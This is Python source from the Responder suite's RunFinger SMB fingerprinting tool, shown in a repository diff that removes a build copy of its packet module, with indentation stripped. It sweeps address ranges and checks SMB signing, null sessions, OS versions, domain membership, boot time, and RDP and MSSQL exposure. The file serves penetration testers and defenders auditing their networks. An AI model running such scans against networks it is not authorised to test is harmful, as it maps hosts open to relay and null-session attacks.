n = SMBNegoDataLanMan()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
if data[8:10] == b'\x72\x00':
return GetHostnameAndDomainName(data)
except IOError as e:
if e.errno == errno.ECONNRESET:
SMB1 = "False"
return False
else:
return False
def SmbFinger(Host):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(Timeout)
try:
s.connect(Host)
except:
pass
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
signing = IsSigningEnabled(data)
if data[8:10] == b'\x72\x00':
head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
t = SMBSessionFingerData()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
if data[8:10] == b'\x73\x16':
OsVersion, ClientVersion = OsNameClientVersion(NetworkRecvBufferPython2or3(data))
return signing, OsVersion, ClientVersion
except:
pass
def check_smb_null_session(host):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(Timeout)
try:
s.connect(host)
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
if data[8:10] == b'\x72\x00':
h = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x17\xc8",mid="\x40\x00")
n = SMBSessionData()
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
if data[8:10] == b'\x73\x16':
h = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x17\xc8",uid=data[32:34].decode('latin-1'),mid="\x80\x00")
n = SMBSession2()
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
if data[8:10] == b'\x73\x00':
h = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",uid=data[32:34].decode('latin-1'),mid="\xc0\x00")
n = SMBTreeConnectData()
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
if data[8:10] == b'\x75\x00':
return 'True'
else:
return 'False'
except Exception:
return False
##################
#SMB2 part:
def ConnectAndChoseSMB(host):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(Timeout)
try:
s.connect(host)
h = SMBHeader(cmd="\x72",flag1="\x00")
n = SMBNego(Data = SMB2NegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(4096)
except:
return False
if ParseNegotiateSMB2Ans(data):
try:
while True:
s.send(NetworkSendBufferPython2or3(handle(data.decode('latin-1'), host)))
data = s.recv(4096)
if not data:
break
except Exception:
return False
else:
return False
def handle(data, host):
if data[28:29] == "\x00":
a = SMBv2Head()
a.calculate()
b = SMBv2Negotiate()
b.calculate()
packet0 =str(a)+str(b)
buffer0 = longueur(packet0)+packet0
return buffer0
if data[28:29] == "\x01":
global Bootime
SMB2SigningMandatory(data)
Bootime = IsDCVuln(GetBootTime(data[116:124]), host[0])
a = SMBv2Head(SMBv2Command="\x01\x00",CommandSequence= "\x02\x00\x00\x00\x00\x00\x00\x00")
a.calculate()
b = SMBv2Session1()
b.calculate()
packet0 =str(a)+str(b)
buffer0 = longueur(packet0)+packet0
return buffer0
if data[28:29] == "\x02":
ParseSMBNTLM2Exchange(data, host[0], Bootime, SMB2signing)
##################
def ShowSmallResults(Host):
if ConnectAndChoseSMB((Host,445)) == False:
try:
Hostname, DomainJoined = DomainGrab((Host, 445))
Signing, OsVer, LanManClient = SmbFinger((Host, 445))
NullSess = check_smb_null_session((Host, 445))
RDP = IsServiceOn((Host,3389))
SQL = IsServiceOn((Host,1433))
print(("[SMB1]:['{}', Os:'{}', Domain:'{}', Signing:'{}', Null Session: '{}', RDP:'{}', MSSQL:'{}']".format(Host, OsVer, DomainJoined, Signing, NullSess,RDP, SQL)))
SaveRunFingerToDb({
'Protocol': '[SMB1]',
'Host': Host,
'WindowsVersion':OsVer,
'OsVer': OsVer,
'DomainJoined':DomainJoined,
'Bootime': 'N/A',
'Signing': Signing,
'NullSess': NullSess,
'IsRDPOn':RDP,
'SMB1': 'True',
'MSSQL': SQL
})
except:
return False
def IsServiceOn(Host):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(Timeout)
try:
s.connect(Host)
if s:
return 'True'
else:
return 'False'
except Exception as err:
return 'False'
def RunFinger(Host):
if Filename != None:
with open(Filename) as fp:
Line = fp.read().splitlines()
for Ln in Line:
m = re.search("/", str(Ln))
if m:
net,_,mask = Ln.partition('/')
mask = int(mask)
net = atod(net)
threads = []
Pool = multiprocessing.Pool(processes=250)
func = ShowSmallResults
for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
proc = Pool.apply_async(func, ((host),))
threads.append(proc)
for proc in threads:
proc.get()
else:
ShowSmallResults(Ln)
if Filename == None:
m = re.search("/", str(Host))
if m:
net,_,mask = Host.partition('/')
mask = int(mask)
net = atod(net)
threads = []
Pool = multiprocessing.Pool(processes=250)
func = ShowSmallResults
for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
proc = Pool.apply_async(func, ((host),))
threads.append(proc)
for proc in threads:
proc.get()
else:
ShowSmallResults(Host)
RunFinger(Host)

625
build/lib/Responder/tools/RunFingerPackets.py
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@ -1,625 +0,0 @@
import random, struct, sys, os
from os import urandom
from socket import *
from time import sleep
from Responder.odict import OrderedDict
#Python version
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
def StructWithLenPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, data)
#Python3...
else:
return struct.pack(endian, data).decode('latin-1')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
class Packet():
fields = OrderedDict([
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in list(kw.items()):
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, list(self.fields.values())))
class SMBHeader(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
class SMBSessionFingerData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\x00\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1","\xb1\x00"), #hardcoded len here and hardcoded packet below, no calculation, faster.
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])
##Now Lanman
class SMBHeaderLanMan(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x08"),
("flag2", "\x01\xc8"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x3c\x1b"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
#We grab the domain and hostname from the negotiate protocol answer, since it is in a Lanman dialect format.
class SMBNegoDataLanMan(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x0c\x00"),#hardcoded len here and hardcoded packet below, no calculation, faster.
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
class SMBSessionData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\xec\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1","\xb1\x00"),
("ApplicationHeaderTag","\x60"),
("ApplicationHeaderLen","\x48"),
("AsnSecMechType","\x06"),
("AsnSecMechLen","\x06"),
("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
("ChoosedTag","\xa0"),
("ChoosedTagStrLen","\x3e"),
("NegTokenInitSeqHeadTag","\x30"),
("NegTokenInitSeqHeadLen","\x3c"),
("NegTokenInitSeqHeadTag1","\xA0"),
("NegTokenInitSeqHeadLen1","\x0e"),
("NegTokenInitSeqNLMPTag","\x30"),
("NegTokenInitSeqNLMPLen","\x0c"),
("NegTokenInitSeqNLMPTag1","\x06"),
("NegTokenInitSeqNLMPTag1Len","\x0a"),
("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenInitSeqNLMPTag2","\xa2"),
("NegTokenInitSeqNLMPTag2Len","\x2a"),
("NegTokenInitSeqNLMPTag2Octet","\x04"),
("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
("NegTokenInitSeqMechSignature","\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
("NegTokenInitSeqMechMessageType","\x01\x00\x00\x00"),
("NegTokenInitSeqMechMessageFlags","\x07\x82\x08\xa2"),
("NegTokenInitSeqMechMessageDomainNameLen","\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameMaxLen","\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameBuffOffset","\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameLen","\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameMaxLen","\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameBuffOffset","\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
("NegTokenInitSeqMechMessageVersionLow","\x01"),
("NegTokenInitSeqMechMessageVersionBuilt","\x28\x0a"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
("NegTokenInitSeqMechMessageVersionTerminator","\x00"),
("nativeOs","Windows 2002 Service Pack 3 2600".encode('utf-16le').decode('latin-1')),
("nativeOsterminator","\x00\x00"),
("nativelan","Windows 2002 5.1".encode('utf-16le').decode('latin-1')),
("nativelanterminator","\x00\x00\x00\x00"),
])
def calculate(self):
data1 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data2 = str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data3 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data4 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data5 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data7 = str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data9 = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
## Packet len
self.fields["andxoffset"] = StructWithLenPython2or3("<H", len(data9)+32)
##Buff Len
self.fields["securitybloblength"] = StructWithLenPython2or3("<H", len(data1))
##Complete Buff Len
self.fields["bcc1"] = StructWithLenPython2or3("<H", len(data5))
##App Header
self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3("<B", len(data2))
##Asn Field 1
self.fields["AsnSecMechLen"] = StructWithLenPython2or3("<B", len(str(self.fields["AsnSecMechStr"])))
##Asn Field 1
self.fields["ChoosedTagStrLen"] = StructWithLenPython2or3("<B", len(data3))
##SpNegoTokenLen
self.fields["NegTokenInitSeqHeadLen"] = StructWithLenPython2or3("<B", len(data4))
##NegoTokenInit
self.fields["NegTokenInitSeqHeadLen1"] = StructWithLenPython2or3("<B", len(data10))
## Tag0 Len
self.fields["NegTokenInitSeqNLMPLen"] = StructWithLenPython2or3("<B", len(data11))
## Tag0 Str Len
self.fields["NegTokenInitSeqNLMPTag1Len"] = StructWithLenPython2or3("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
## Tag2 Len
self.fields["NegTokenInitSeqNLMPTag2Len"] = StructWithLenPython2or3("<B", len(data6))
## Tag3 Len
self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = StructWithLenPython2or3("<B", len(data7))
#########################################################################################################
class SMBSession2(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00"),
("andxoffset", "\xfa\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x01\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x59\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1","\xbf\x00"),
("ApplicationHeaderTag","\xa1"),
("ApplicationHeaderLen","\x57"),
("AsnSecMechType","\x30"),
("AsnSecMechLen","\x55"),
("ChoosedTag","\xa2"),
("ChoosedTagLen","\x53"),
("ChoosedTag1","\x04"),
("ChoosedTag1StrLen","\x51"),
("NLMPAuthMsgSignature", "\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
("NLMPAuthMsgMessageType","\x03\x00\x00\x00"),
("NLMPAuthMsgLMChallengeLen","\x01\x00"),
("NLMPAuthMsgLMChallengeMaxLen","\x01\x00"),
("NLMPAuthMsgLMChallengeBuffOffset","\x50\x00\x00\x00"),
("NLMPAuthMsgNtChallengeResponseLen","\x00\x00"),
("NLMPAuthMsgNtChallengeResponseMaxLen","\x00\x00"),
("NLMPAuthMsgNtChallengeResponseBuffOffset","\x51\x00\x00\x00"),
("NLMPAuthMsgNtDomainNameLen","\x00\x00"),
("NLMPAuthMsgNtDomainNameMaxLen","\x00\x00"),
("NLMPAuthMsgNtDomainNameBuffOffset","\x48\x00\x00\x00"),
("NLMPAuthMsgNtUserNameLen","\x00\x00"),
("NLMPAuthMsgNtUserNameMaxLen","\x00\x00"),
("NLMPAuthMsgNtUserNameBuffOffset","\x48\x00\x00\x00"),
("NLMPAuthMsgNtWorkstationLen","\x08\x00"),
("NLMPAuthMsgNtWorkstationMaxLen","\x08\x00"),
("NLMPAuthMsgNtWorkstationBuffOffset","\x48\x00\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageLen","\x00\x00"),
